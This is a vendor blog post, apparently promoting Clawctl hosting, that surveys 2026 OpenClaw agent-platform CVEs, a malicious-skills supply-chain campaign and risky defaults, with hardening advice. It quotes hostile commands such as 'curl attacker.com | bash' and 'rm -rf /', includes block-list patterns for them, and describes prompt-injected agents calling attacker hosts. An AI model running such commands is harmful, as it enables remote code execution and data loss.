
OpenClaw Security Risks in 2026: Every Incident, CVE, and Exploit We Found

40,000+ exposed OpenClaw instances. 6 CVEs. 824 malicious skills. We reviewed every documented OpenClaw security incident of 2026. Here's the honest picture.

Clawctl Team

Product & Engineering


63% of the 40,000+ OpenClaw instances on the public internet are running vulnerable software right now.

That number comes from Bitsight, not us. We just spent three weeks reading every CVE, every incident report, every Hacker News thread, and every Reddit post about OpenClaw security in 2026.

Here's the honest picture.

It's not pretty. But it's fixable. And knowing the actual risks is step one.


The Exposure Problem: 40,000 Open Doors

OpenClaw is the hottest open-source AI agent platform on the planet. It lets you spin up autonomous agents that write code, browse the web, and run shell commands.

That power is the point. It's also the problem.

Bitsight's research team found over 40,000 OpenClaw instances exposed to the public internet. No VPN. No firewall. Just... sitting there.

Of those 40,000+ instances, 63% were running versions with known security holes.

Worse: 93.4% of exposed instances had authentication bypasses. That means almost every public OpenClaw box lets anyone walk in the front door.

No password. No SSO. No nothing.

How does this happen? Simple. OpenClaw ships with permissive defaults. The docs tell you to lock things down. Most people skip that part.

They spin up a box, connect it to GPT or Claude, give it shell access, and move on. The agent works. They're happy. They never think about who else can access it.

Until someone does.


The CVE Wave: Six Vulnerabilities in Three Months

2026 has been brutal for OpenClaw CVEs. Six confirmed vulnerabilities since January. Here are the ones that matter.

CVE-2026-25253: One-Click RCE (CVSS 8.8)

This is the big one.

A single malicious link could give an attacker full remote code execution on your OpenClaw server. CVSS score: 8.8 out of 10. That's "critical" territory.

The attack was simple. Trick an admin into clicking a link. The link triggers an agent action. The agent runs attacker-controlled code on your box.

Game over.

Microsoft published a warning about this one. So did Cisco Talos. When those two agree on something, pay attention.

CVE-2026-32048: Sandbox Escape

This one scared us.

OpenClaw runs agents in sandboxed containers. That sandbox is supposed to keep agents from touching things they shouldn't. CVE-2026-32048 broke that promise.

The exploit used cross-agent session_spawn to escape the sandbox. A compromised agent could jump out of its container and access other agents' data. Or the host system.

Think about what that means. One bad agent takes down your entire deployment.

CVE-2026-32064: Unauthenticated VNC Access

OpenClaw gives agents browser access through a sandboxed VNC session. Good idea. Bad execution.

CVE-2026-32064 let anyone access that VNC session without logging in. No auth needed. You could watch the agent browse. Or take over the browser yourself.

If the agent was logged into internal tools, those credentials were now yours.

The Pattern

Six CVEs in three months. Each one targets a different part of the stack. RCE. Sandbox escape. Auth bypass. VNC exposure.

This isn't one weak spot. The whole surface is hot.

Patches exist for all of these. But remember that 63% stat? Most people aren't patching.


The Supply Chain Attack: 824 Poisoned Skills

CVEs are bad. This might be worse.

Koi Security discovered a campaign they named ClawHavoc in early 2026. Attackers uploaded 824+ malicious skills to ClawHub, OpenClaw's community skill marketplace.

Think of ClawHub like npm or PyPI, but for AI agent capabilities. Install a skill and your agent gets new powers. Browse the web. Parse PDFs. Send emails.

Or, if you install the wrong skill: exfiltrate every API key and secret in your environment.

The malicious skills looked legit. Professional READMEs. Good star counts (faked). Names close to popular skills (typosquatting).

But buried in the skill code were payloads that grabbed:

  • API keys (OpenAI, Anthropic, AWS)
  • Environment variables
  • SSH keys
  • Database connection strings

The data got shipped to attacker-controlled servers. Quietly.

Koi Security estimates hundreds of teams installed at least one poisoned skill before the campaign was caught.

This is the AI version of the event-stream npm attack. And ClawHub still doesn't have mandatory code review for published skills.


The Config Problem: Your Settings Are the Real Vulnerability

Here's the uncomfortable truth.

Most OpenClaw security incidents aren't from zero-day exploits. They're from bad config.

We read through dozens of posts on r/openclaw and Hacker News. The same patterns show up again and again:

1. No auth on the web UI. OpenClaw doesn't force you to set a password. So people don't. Their agent dashboard is one URL guess away from anyone.

2. Unrestricted network egress. Agents can reach any IP on the internet by default. If an agent gets tricked by a prompt injection, it can phone home to an attacker's server. No firewall rules to stop it. (We wrote an entire guide on egress controls and domain allowlists.)

3. Host Docker socket mounted. Many tutorials tell you to mount /var/run/docker.sock into the container. This gives the agent root-level control of your host machine. It's like handing your house keys to a stranger because they promised to only use the bathroom.

4. No action allowlists. OpenClaw lets agents run any shell command by default. rm -rf /? Sure. curl attacker.com | bash? No problem. Without explicit blocklists or allowlists, agents can do anything.

5. Stale versions running in production. Teams deploy OpenClaw once and forget about it. Three months later, they're running a version with five known CVEs. Auto-update isn't on by default.

The Kaspersky team published a report that confirmed this pattern. Config errors cause more breaches than code vulnerabilities. By a wide margin.

China went so far as to restrict OpenClaw deployments over these concerns. The South China Morning Post reported that regulators flagged uncontrolled agent access to sensitive systems as a national security risk.

When a nation-state thinks your config defaults are dangerous, that's a signal.


What This Means For You

Let's get practical.

If you're running OpenClaw, here's what you need to do today. Not tomorrow. Today.

Patch immediately

Check your version. If you're behind, update. Every CVE listed above has a patch. There's no excuse for running a known-vulnerable version in production.

Lock down authentication

Put OpenClaw behind SSO or, at minimum, strong passwords. Never expose the web UI to the public internet without auth. Our step-by-step hardening guide walks you through this in 20 minutes.

Sandbox properly

Don't mount the Docker socket. Use a socket proxy with scoped permissions. Better yet, use gVisor or Sysbox for real kernel-level isolation.

Control network egress

Block all outbound traffic except the specific domains your agent needs. If your agent only calls the OpenAI API, it shouldn't be able to reach anything else.

Audit your skills

Don't install random skills from ClawHub. Read the code first. Pin specific versions. Watch for typosquatted package names. Read how 824 malicious skills landed on ClawHub — and how to check if you installed one.

Block high-risk actions

Create an allowlist of permitted shell commands. Block rm -rf, curl | bash, chmod 777, and other obvious footguns. OpenClaw supports action filters. Use them. See our guide on guardrails: what to block, what to allow.

Turn on audit logging

You can't fix what you can't see. Log every agent action. Review the logs. Set alerts for weird behavior.

Consider human-in-the-loop

For high-risk actions (file deletion, network requests, code execution outside the sandbox), require a human to approve. This kills agent speed but saves you from catastrophic mistakes.
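The action filter, egress allowlist, audit log and human-in-the-loop queue from the steps above, combined into one policy gate. This is an added example, not OpenClaw's or Clawctl's code; the command allowlist, review list and egress allowlist are constructed assumptions you would tune per deployment.

```python
"""Policy gate for agent shell commands: ALLOW, DENY, or REVIEW (human approval).
Added example; all lists below are assumptions, not OpenClaw defaults."""
import re
import shlex
import time
from urllib.parse import urlparse

# Commands the agent may run unattended (assumption: a typical coding agent).
ALLOWED_COMMANDS = {"ls", "cat", "grep", "git", "python", "pytest", "npm", "node"}
# Commands that always queue for human approval.
REVIEW_COMMANDS = {"rm", "curl", "wget", "chmod", "docker", "ssh"}
# Egress allowlist for network tools (assumption: the agent only needs OpenAI).
ALLOWED_EGRESS = {"api.openai.com"}
# The obvious footguns named in the article, matched on the raw command line.
BLOCKED_PATTERNS = [
    re.compile(r"\brm\s+-\w*r\w*\s+/\*?(\s|$)"),      # rm -rf /
    re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"),   # curl ... | bash
    re.compile(r"\bchmod\s+777\b"),                   # chmod 777
    re.compile(r"/var/run/docker\.sock"),             # touching the Docker socket
]
AUDIT_LOG = []  # in-memory stand-in for a real append-only log sink

def egress_host(argv):
    """Hostname of the first URL argument, or None when no URL is given."""
    for arg in argv:
        if arg.startswith(("http://", "https://")):
            return urlparse(arg).hostname
    return None

def evaluate(command):
    """Classify one proposed shell command; every pipeline stage is checked."""
    if any(p.search(command) for p in BLOCKED_PATTERNS):
        return "DENY"
    try:
        stages = [shlex.split(s) for s in re.split(r"\|\|?|&&|;", command) if s.strip()]
    except ValueError:          # unbalanced quotes: refuse what we cannot parse
        return "DENY"
    decision = "ALLOW"
    for argv in stages:
        name = argv[0].rsplit("/", 1)[-1]
        if name in ("curl", "wget"):
            host = egress_host(argv)
            if host is None or host not in ALLOWED_EGRESS:
                return "DENY"   # deny-all egress: unknown or missing destination
        if name in REVIEW_COMMANDS:
            decision = "REVIEW"
        elif name not in ALLOWED_COMMANDS:
            return "DENY"       # not on the allowlist: default deny
    return decision

def gate(command, agent_id):
    """Evaluate, append an audit record for the decision, and return it."""
    decision = evaluate(command)
    AUDIT_LOG.append({"ts": time.time(), "agent": agent_id, "cmd": command, "decision": decision})
    return decision
```

A REVIEW result is where the human-in-the-loop approval sits: the command waits for an operator instead of running, and the audit record shows who approved it.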


The Bigger Picture: AI Agent Security Risks

OpenClaw isn't alone here. Every AI agent platform faces these risks.

NVIDIA built NemoClaw with guardrails baked in. Anthropic's Claude Cowork ships with restrictive defaults. Both are responses to the same problem: autonomous agents with unrestricted access are dangerous.

The difference is philosophy. OpenClaw gives you maximum power and trusts you to lock it down. Others restrict power by default and make you unlock it.

Neither approach is wrong. But one is clearly more dangerous in the hands of a team that doesn't have a security engineer on staff.

And most teams don't.


Frequently Asked Questions

Is OpenClaw safe to use in 2026?

It can be. But most deployments aren't.

93.4% of exposed instances have auth bypasses. That tells you the average OpenClaw deployment is not safe. The software can be hardened. Most people just don't do it.

If you lock down auth, sandbox execution, control egress, and keep patches current, OpenClaw is usable. Skip any one of those steps and you're rolling dice.

What are the biggest OpenClaw vulnerabilities?

Three stand out in 2026:

  • CVE-2026-25253 — One-click remote code execution (CVSS 8.8)
  • CVE-2026-32048 — Sandbox escape via cross-agent session_spawn
  • CVE-2026-32064 — Unauthenticated VNC access to agent browsers

Each one targets a different layer. Together, they cover RCE, isolation bypass, and auth failure.

How many OpenClaw instances are exposed to the internet?

Over 40,000, per Bitsight. 63% run vulnerable versions. Most have no authentication. They're discoverable through basic port scanning.

What is the ClawHavoc attack?

ClawHavoc is a supply chain campaign found by Koi Security. Attackers published 824+ malicious skills on ClawHub. The skills looked real but contained payloads that stole API keys, secrets, and credentials from anyone who installed them.

Can OpenClaw agents escape their sandbox?

Yes. CVE-2026-32048 proved it. Cross-agent session_spawn allowed container escape. The patch exists, but the incident proved that OpenClaw's default sandbox isn't a hard security boundary.

Why did China restrict OpenClaw?

National security concerns. Regulators worried about uncontrolled AI agents accessing sensitive systems without oversight. The South China Morning Post reported the restrictions in early 2026.

What is the most secure way to run OpenClaw?

Behind auth (SSO preferred). With Docker isolation (Sysbox or gVisor, not raw socket mounts). With egress controls. With audited skills only. With audit logging on. With human-in-the-loop for dangerous actions.

That's a lot of boxes to check. Which is the whole point.


One More Thing

We built Clawctl because we got tired of checking all those boxes ourselves.

Clawctl is managed OpenClaw hosting. Every deployment ships with:

  • Docker socket proxy isolation — each tenant gets its own container with a proxy sidecar. Agents never touch your host.
  • Egress controls — Squid proxy with deny-all default. Only approved domains get through.
  • 50+ high-risk actions blocked by default — no rm -rf, no curl | bash, no socket mounts without human approval.
  • Audit logging — every agent action recorded, searchable, and retained by plan tier.
  • Human-in-the-loop approvals — dangerous actions queue for manual review before they execute.
  • Prompt injection defenses — 9 attack pattern categories detected and blocked automatically.

You can run OpenClaw securely on your own. Many teams do. But if you'd rather not become a part-time security engineer, Clawctl handles it.

Your agents should be building things. Not giving you nightmares.

